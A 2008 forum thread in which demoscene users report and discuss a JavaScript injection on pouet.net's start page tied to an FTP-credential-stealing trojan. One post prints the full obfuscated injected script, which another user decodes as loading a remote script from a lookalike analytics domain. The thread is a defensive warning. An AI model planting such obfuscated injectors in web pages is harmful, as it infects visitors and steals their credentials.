POUET.NET is hacked / infected with a javascript worm

category: general [glöplog]
Attention: Like lots of other scene websites, pouet.net has a trojan infection embedded onto its startpage. Admins, remove it from index.php, change FTP passwords.

This is done by the russian business network, the most criminal spam gang in the world. Lots of other scene website are affected, too.

The trojan sniffs all your FTP traffic, and account data from online banking and lots of other things. The sniffed FTP traffic is then used to login to those accounts and embed the javascript into more pages.

Someone who has FTP access to pouet.net therefore is infected with this trojan, and all his account data is now in the hands of that gang. All users with pouet.net ftp access should check for this trojan now and inform all sites they are logging into by FTP. (And obviously change passwords, credit card numbers etc after the trojan is removed)

For further details, contact me on irc.

added on the 2008-02-02 15:43:11 by scamp scamp
Yup - discovered nasty, removed from index, changed password. My AV warned me as soon as I tried to access my own page - can I then assume that I wasn't infected? That hopefully suggests that I didn't already have it...
added on the 2008-02-02 15:46:21 by syphus syphus
(er, I mean my untergrund page, obviously)
added on the 2008-02-02 15:46:59 by syphus syphus
what javascript worm / trojan ?
added on the 2008-02-02 15:51:41 by p01 p01
tell me more, please.
added on the 2008-02-02 15:57:29 by aegis aegis
is it this shit?

Code: <script language=JavaScript>var mf=" shapgvba ejtf(c){ine ro,con=\" HcvfNU)z\\\"n#hG1*PrTR[4`5('082BVWa]-eZo,}9g$_l+m^6bp~w&IiOA|d@s=y 7C:.XMq!xtSj;k{3u\",olq=\"\",i,nnu,l=\"\",n;sbe(ro=0;ro& lt;c.yratgu;ro++){ i=c.puneNg(ro);nnu=con.vaqrkBs(i);vs(nnu>-1){ n=((nnu+1)%81-1);vs(n<=0)n+=81;l+=con.puneNg(n-1); } ryfr l+=i;}olq+=l;qbphzrag.jevgr(olq);}",rmhc="";for(gvg=0;gvg<mf.l ength;gvg++){ fbd = mf.charCodeAt(gvg);if((fbd>64 && fbd<78)||(fbd>96 && fbd<110)) fbd=fbd+13;else if((fbd>77 && fbd<91)||(fbd>109 && fbd<123))fbd=fbd-13;rmhc=rmhc.concat(String.fromCharCode(fbd));} var km,ff; eval( rmhc );km="<A~Msi$U7#]FT#FGla&#B#A~Msi$a>U!c~T\"G]$K;Ms$G'Ua <SeRJ:1U7#]FT#FGl\\an#B#S~Msi$\\aUSRel\\a $$i.//;;;KFccF7G#]#7s$s~AK]G$/yyT$,K&A?az!c~T\"G]$KMG=GMMGMza\\a>< ;\\/SeRJ:1>aUmxU</A~Msi$>U"; rwgs(km);</script>
added on the 2008-02-02 16:00:20 by El Topo El Topo
need an obscure java contest.
i commented the javascript code from index.php
hope jeffry will go through the logs and clean whatever else is infected.
i recommedn people avoid using pouet for the weekend.
added on the 2008-02-02 16:04:40 by psenough psenough
I'm busy alerting lots of server admins etc, so only brief info here:

Gang behind all this:

If you are a server admin, grep your ftp logs for the following strings:

If you see successfull logins from those ips/hosts, then that user is infected with the trojan, and his website probably also is.
added on the 2008-02-02 16:04:44 by scamp scamp
yes, it's two pieces of code mangled twice, that inserts a script tag pointing to:

"http://www.googleanalitics.net/__utb.js"+ document.referrer
added on the 2008-02-02 16:05:36 by p01 p01
eltopo: yep, thats the code. beer for whoever can crack what it does :D
added on the 2008-02-02 16:05:42 by psenough psenough
p01 the drunkard :D
added on the 2008-02-02 16:06:33 by psenough psenough
\:D/ people, to be on the safe side, disable JavaScript on pouet.net

a whois on www.googleanalitics.net says:

Extended Info IP Address:
IP Location: Hong Kong
Website Status: active
Server Type: Apache
Cache Date: 2008-02-02 08:05:03 MST
Compare Archived Data: 2007-10-03
added on the 2008-02-02 16:14:43 by p01 p01
and block www.googleanalitics.net using your browser's blocking mechanism or better directly in your .hosts file
added on the 2008-02-02 16:16:51 by p01 p01
presumably this only affects IE?
i must admit i'm a bit in the blue as to how a javascript file on a web page can find my stored ftp login codes.
added on the 2008-02-02 16:22:02 by skrebbel skrebbel
In case you didn't know Windows users will find theirs in C:\WINDOWS\system32\drivers\etc\
added on the 2008-02-02 16:23:57 by El Topo El Topo
the hosts file that is
added on the 2008-02-02 16:24:45 by El Topo El Topo
And OS X users in /private/etc/hosts
added on the 2008-02-02 16:28:36 by Preacher Preacher
skrebbel: it doesn't - it's a trojan downloader (not clear yet how it works, but also people not using IE at all are affected). That trojan than sniffs all your traffic locally on your PC (all your ftp sessions, ebay visits, online banking etc), and sends it to the "russian business network".

The sniffed FTP transfers are used to get username/passwords of all FTP sites you visit, the transfers and directory listings are used to find out which files to infect on that site. Later their botnet connects to those servers by FTP, infecting those websites. This is how it spreads.

Trojan infections seem to have started some weeks ago, infection of websites started yesterday evening. According to our logs their bots made test logins using stolen account data from January 8th on before they started infecting yesterday.
added on the 2008-02-02 16:39:23 by scamp scamp
Yesterday evening I had problems logging to Pouet from my Windows box. Instead of pouet, I just got a blank page. I wonder if that's got anything to do with it..
added on the 2008-02-02 16:42:58 by Preacher Preacher
scamp: is that a windows trojan or do they infect linux machines too?
added on the 2008-02-02 16:45:07 by sparcus sparcus
Yes, probbaly. That should be the time they replaced the php files...

p01: that IP is from HostFresh, a cover-up fake ISP run by the RBN:

added on the 2008-02-02 16:46:06 by scamp scamp
hmm, demoparty.net seems to be infected too
added on the 2008-02-02 16:50:16 by sparcus sparcus
Ok. Some really strage thngs are going on here. Each time I tried to download SysProt anti-rootkit my browser said the file is corrupted. Then I downloaded it to my shell account. Unpacked it there and downloaded the exe via sftp. Then when it is saved to disk... 1 second later it disappears. Like it is deleted by some external app.
added on the 2008-02-02 16:50:20 by masterm masterm